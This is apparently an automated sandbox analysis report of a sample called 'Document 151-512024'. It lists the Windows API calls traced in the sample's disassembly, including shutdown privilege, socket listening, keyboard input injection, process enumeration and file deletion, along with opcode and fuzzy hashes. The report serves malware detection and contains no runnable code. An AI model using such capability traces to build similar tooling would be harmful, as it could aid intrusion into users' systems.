                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1737998785-0
                                                                                                    • Opcode ID: b9340a26e4978a92b0d82300e1dd07e6de418c02c8da109a11a5227bf9f4c6ee
                                                                                                    • Instruction ID: b9686b00e159d4de95a9b80fa2e5eb25b2ae437ffca8eb2d1c5c52c80e75fd91
                                                                                                    • Opcode Fuzzy Hash: b9340a26e4978a92b0d82300e1dd07e6de418c02c8da109a11a5227bf9f4c6ee
                                                                                                    • Instruction Fuzzy Hash: 0041E275209212AFD710CF15D988F99BBE9FF84328F14C499E4268F6A2C775EC81CB90
                                                                                                    APIs
                                                                                                      • Part of subcall function 009A16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009A170D
                                                                                                      • Part of subcall function 009A16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009A173A
                                                                                                      • Part of subcall function 009A16C3: GetLastError.KERNEL32 ref: 009A174A
                                                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 009AE932
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                    • String ID: $ $@$SeShutdownPrivilege
                                                                                                    • API String ID: 2234035333-3163812486
                                                                                                    • Opcode ID: af1e7a5d0fe6e2ce531549e0d1259a83c25d97e568e97c98f6ccef651394d7d2
                                                                                                    • Instruction ID: 7675fda27ef4ceeb0f37cd57baba3cd04ca3e0a23d716e840e1bbe497a70edb6
                                                                                                    • Opcode Fuzzy Hash: af1e7a5d0fe6e2ce531549e0d1259a83c25d97e568e97c98f6ccef651394d7d2
                                                                                                    • Instruction Fuzzy Hash: 29014972624311ABEB5422B4AC8AFFF735CAB86780F150822FC03F20D1D5A45C8091E0
                                                                                                    APIs
                                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 009C1276
                                                                                                    • WSAGetLastError.WSOCK32 ref: 009C1283
                                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 009C12BA
                                                                                                    • WSAGetLastError.WSOCK32 ref: 009C12C5
                                                                                                    • closesocket.WSOCK32(00000000), ref: 009C12F4
                                                                                                    • listen.WSOCK32(00000000,00000005), ref: 009C1303
                                                                                                    • WSAGetLastError.WSOCK32 ref: 009C130D
                                                                                                    • closesocket.WSOCK32(00000000), ref: 009C133C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                    • String ID:
                                                                                                    • API String ID: 540024437-0
                                                                                                    • Opcode ID: fcbe47b592635e9a2649f5cea25efc15850ee8ed6ae8e16e36496062436c97cc
                                                                                                    • Instruction ID: 887437942f927d117d10d78a0f60605548c0590bb23e128a15342636dd6b1894
                                                                                                    • Opcode Fuzzy Hash: fcbe47b592635e9a2649f5cea25efc15850ee8ed6ae8e16e36496062436c97cc
                                                                                                    • Instruction Fuzzy Hash: 2B418E75A001419FD710DF64C488F2ABBE5AF86318F18818DE8668F293C771ED81DBE2
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 0097B9D4
                                                                                                    • _free.LIBCMT ref: 0097B9F8
                                                                                                    • _free.LIBCMT ref: 0097BB7F
                                                                                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,009E3700), ref: 0097BB91
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00A1121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0097BC09
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00A11270,000000FF,?,0000003F,00000000,?), ref: 0097BC36
                                                                                                    • _free.LIBCMT ref: 0097BD4B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                    • String ID:
                                                                                                    • API String ID: 314583886-0
                                                                                                    • Opcode ID: ffeabffcfaf4e8d3f5b96561472d217c062354290b26f5fd9ab770b0b1cc1ea4
                                                                                                    • Instruction ID: e773913560d0227cf8dc3c73ee22beec1e6e88612cf0b2fb140ebe2facc5438e
                                                                                                    • Opcode Fuzzy Hash: ffeabffcfaf4e8d3f5b96561472d217c062354290b26f5fd9ab770b0b1cc1ea4
                                                                                                    • Instruction Fuzzy Hash: 68C1E773904209AEDB25EF798841BAA7BADEF81310F18C56AE998D7251E7309E41C750
                                                                                                    APIs
                                                                                                      • Part of subcall function 00943AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00943A97,?,?,00942E7F,?,?,?,00000000), ref: 00943AC2
                                                                                                      • Part of subcall function 009AE199: GetFileAttributesW.KERNEL32(?,009ACF95), ref: 009AE19A
                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 009AD420
                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 009AD470
                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 009AD481
                                                                                                    • FindClose.KERNEL32(00000000), ref: 009AD498
                                                                                                    • FindClose.KERNEL32(00000000), ref: 009AD4A1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                    • String ID: \*.*
                                                                                                    • API String ID: 2649000838-1173974218
                                                                                                    • Opcode ID: c5a584131ba916ddb17633df2588f66583ea26abcea6a96ec33fbca7ff692c50
                                                                                                    • Instruction ID: 77cdc11c3ff8f1a317ae5ecb701f3054782456be26e14feacc9eff846fc751aa
                                                                                                    • Opcode Fuzzy Hash: c5a584131ba916ddb17633df2588f66583ea26abcea6a96ec33fbca7ff692c50
                                                                                                    • Instruction Fuzzy Hash: 71316D7105D3459FC204EF64D895DAFB7E8AED6304F444A1EF4D2921A1EB20EA09D7A3
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __floor_pentium4
                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                    • API String ID: 4168288129-2761157908
                                                                                                    • Opcode ID: aa6619792eaef5c8d7f3f88dcccad3c7f8eefeacbe6a3fbc6acf9bc4ae22205a
                                                                                                    • Instruction ID: 34fe2d2a80d6206975fa952a622192af50a1a4de7b48173b43e94b65250fd167
                                                                                                    • Opcode Fuzzy Hash: aa6619792eaef5c8d7f3f88dcccad3c7f8eefeacbe6a3fbc6acf9bc4ae22205a
                                                                                                    • Instruction Fuzzy Hash: 92C23F72E086298FDB25CF28DD507E9B7B9EB49304F1485EAD44DE7240E778AE818F40
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 009B64DC
                                                                                                    • CoInitialize.OLE32(00000000), ref: 009B6639
                                                                                                    • CoCreateInstance.OLE32(009DFCF8,00000000,00000001,009DFB68,?), ref: 009B6650
                                                                                                    • CoUninitialize.OLE32 ref: 009B68D4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                    • String ID: .lnk
                                                                                                    • API String ID: 886957087-24824748
                                                                                                    • Opcode ID: 62dc87dffdb6a15cf6d6c78f3cf389846c4b667f63b872129f6ffb7a131a5fd6
                                                                                                    • Instruction ID: 133cc62c047e438a530757ea84903100511757d0d44336392307f851b159d3b0
                                                                                                    • Opcode Fuzzy Hash: 62dc87dffdb6a15cf6d6c78f3cf389846c4b667f63b872129f6ffb7a131a5fd6
                                                                                                    • Instruction Fuzzy Hash: DBD14871508201AFC314EF64C981EABB7E8FFD9714F00496DF5958B2A1EB71E909CB92
                                                                                                    APIs
                                                                                                    • GetForegroundWindow.USER32(?,?,00000000), ref: 009C22E8
                                                                                                      • Part of subcall function 009BE4EC: GetWindowRect.USER32(?,?), ref: 009BE504
                                                                                                    • GetDesktopWindow.USER32 ref: 009C2312
                                                                                                    • GetWindowRect.USER32(00000000), ref: 009C2319
                                                                                                    • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 009C2355
                                                                                                    • GetCursorPos.USER32(?), ref: 009C2381
                                                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 009C23DF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                    • String ID:
                                                                                                    • API String ID: 2387181109-0
                                                                                                    • Opcode ID: af05287996720e985b0baff1ce0bb9ab9ef6adf47fb5dcde05c4a5c2413309c8
                                                                                                    • Instruction ID: ae12e0bd8db12b69942c0810c3c13171c941720b696abcfc163a7f689b4c9b1f
                                                                                                    • Opcode Fuzzy Hash: af05287996720e985b0baff1ce0bb9ab9ef6adf47fb5dcde05c4a5c2413309c8
                                                                                                    • Instruction Fuzzy Hash: 8C31CF72509356ABC720DF14D849F9BB7A9FF84710F00091EF985A7191DB34E948CB92
                                                                                                    APIs
                                                                                                      • Part of subcall function 00949CB3: _wcslen.LIBCMT ref: 00949CBD
                                                                                                    • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 009B9B78
                                                                                                    • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 009B9C8B
                                                                                                      • Part of subcall function 009B3874: GetInputState.USER32 ref: 009B38CB
                                                                                                      • Part of subcall function 009B3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009B3966
                                                                                                    • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 009B9BA8
                                                                                                    • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 009B9C75
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                    • String ID: *.*
                                                                                                    • API String ID: 1972594611-438819550
                                                                                                    • Opcode ID: 3e20996ccdb2c9484a36c611e66265d2566910641b038201e794eb1b866643f7
                                                                                                    • Instruction ID: 8d18309fdc43cdcf59454f3e579843ddfe03d00925711b8db96f4e9f7410d716
                                                                                                    • Opcode Fuzzy Hash: 3e20996ccdb2c9484a36c611e66265d2566910641b038201e794eb1b866643f7
                                                                                                    • Instruction Fuzzy Hash: 8D41827195420AAFCF14DFB4C999BEE7BB8EF45320F204156E549A3291EB309E84CF60
                                                                                                    APIs
                                                                                                    • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 009AAAAC
                                                                                                    • SetKeyboardState.USER32(00000080), ref: 009AAAC8
                                                                                                    • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 009AAB36
                                                                                                    • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 009AAB88
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                    • String ID: e31
                                                                                                    • API String ID: 432972143-350795219
                                                                                                    • Opcode ID: 515099c2036b44e11e045e0e8b3e53db8dd1c07d41a2d2232c08869089798051
                                                                                                    • Instruction ID: f08c9688b8b7c0caf165024fb1b5ca5abdcbebd9752dc7f50774872384735d9c
                                                                                                    • Opcode Fuzzy Hash: 515099c2036b44e11e045e0e8b3e53db8dd1c07d41a2d2232c08869089798051
                                                                                                    • Instruction Fuzzy Hash: 5D312870A80208AFFF35CB65CC05BFA7BAAAB56320F04421BF581965D1D3798981D7F2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: ERCP$Se31$VUUU$VUUU$VUUU$VUUU
                                                                                                    • API String ID: 0-1520504141
                                                                                                    • Opcode ID: 208e5dde1af0efa866d7278abb681af41d3e7fbb0c2a919874f641a516c869a5
                                                                                                    • Instruction ID: 97718df2c2a1f1fccd113e7fddbd4ee73616831b95bfd30d5214b0ab8fbce641
                                                                                                    • Opcode Fuzzy Hash: 208e5dde1af0efa866d7278abb681af41d3e7fbb0c2a919874f641a516c869a5
                                                                                                    • Instruction Fuzzy Hash: 5DA2C070E0021ACBDF24DF58C844BAEB7B5BF54314F2585AAE815AB385EB749D81CF90
                                                                                                    APIs
                                                                                                      • Part of subcall function 00959BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00959BB2
                                                                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 00959A4E
                                                                                                    • GetSysColor.USER32(0000000F), ref: 00959B23
                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 00959B36
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$LongProcWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3131106179-0
                                                                                                    • Opcode ID: 6e779de512641641b855bbabec6c2d5e7c220cb7d1a215b28dbdc64880600e70
                                                                                                    • Instruction ID: 1c3d95c9730caa871140ef948a184e4910dda083d0bf6cbbbcc58cba7118f748
                                                                                                    • Opcode Fuzzy Hash: 6e779de512641641b855bbabec6c2d5e7c220cb7d1a215b28dbdc64880600e70
                                                                                                    • Instruction Fuzzy Hash: 6EA13CB0118544FEFB24EBBE8C98FBB769DDB82302F14450AF912C6691CE299D05D372
                                                                                                    APIs
                                                                                                      • Part of subcall function 009C304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 009C307A
                                                                                                      • Part of subcall function 009C304E: _wcslen.LIBCMT ref: 009C309B
                                                                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 009C185D
                                                                                                    • WSAGetLastError.WSOCK32 ref: 009C1884
                                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 009C18DB
                                                                                                    • WSAGetLastError.WSOCK32 ref: 009C18E6
                                                                                                    • closesocket.WSOCK32(00000000), ref: 009C1915
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                    • String ID:
                                                                                                    • API String ID: 1601658205-0
                                                                                                    • Opcode ID: f00d65ddc63cf7095a5bb90078f7537ae67df46c48852756066d12aaa5d47003
                                                                                                    • Instruction ID: ec4f6441d515ddccbdc4d94bb21d435e2fa02565565c8a8449218cf1e48dbf0d
                                                                                                    • Opcode Fuzzy Hash: f00d65ddc63cf7095a5bb90078f7537ae67df46c48852756066d12aaa5d47003
                                                                                                    • Instruction Fuzzy Hash: 6951C4B1A00210AFDB10EF24C886F2AB7E5AB85718F14849CF9159F3D3D775AD41CBA2
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                    • String ID:
                                                                                                    • API String ID: 292994002-0
                                                                                                    • Opcode ID: bf59d0ab83e8026853d57e8dad6597fd147d521216b25208fa5bdc40ab65f41d
                                                                                                    • Instruction ID: 59210a53e67fe7c1597ad3530328bc61a0f832f88b1cc8971c3d5a21e5573ec9
                                                                                                    • Opcode Fuzzy Hash: bf59d0ab83e8026853d57e8dad6597fd147d521216b25208fa5bdc40ab65f41d
                                                                                                    • Instruction Fuzzy Hash: 0821D3727D52016FD7208F2AC844B2A7BA9EF95315B18C05AE88A8B351D771EC42CB90
                                                                                                    APIs
                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 009CA6AC
                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 009CA6BA
                                                                                                      • Part of subcall function 00949CB3: _wcslen.LIBCMT ref: 00949CBD
                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 009CA79C
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 009CA7AB
                                                                                                      • Part of subcall function 0095CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00983303,?), ref: 0095CE8A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1991900642-0
                                                                                                    • Opcode ID: fe2400e9de525b6a184017c83f7064146d5a8883918eca8b4e989e1d77c62060
                                                                                                    • Instruction ID: 696cd26a0d1d9539aa12cc8a2dcc24747534ad5ef04e11962b26f2bcfa7b55c2
                                                                                                    • Opcode Fuzzy Hash: fe2400e9de525b6a184017c83f7064146d5a8883918eca8b4e989e1d77c62060
                                                                                                    • Instruction Fuzzy Hash: 7351F6B1908311AFD714EF25C886E6BBBE8AFC9754F00491DF98597262EB30D904CB92
                                                                                                    APIs
                                                                                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 009BCE89
                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 009BCEEA
                                                                                                    • SetEvent.KERNEL32(?,?,00000000), ref: 009BCEFE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
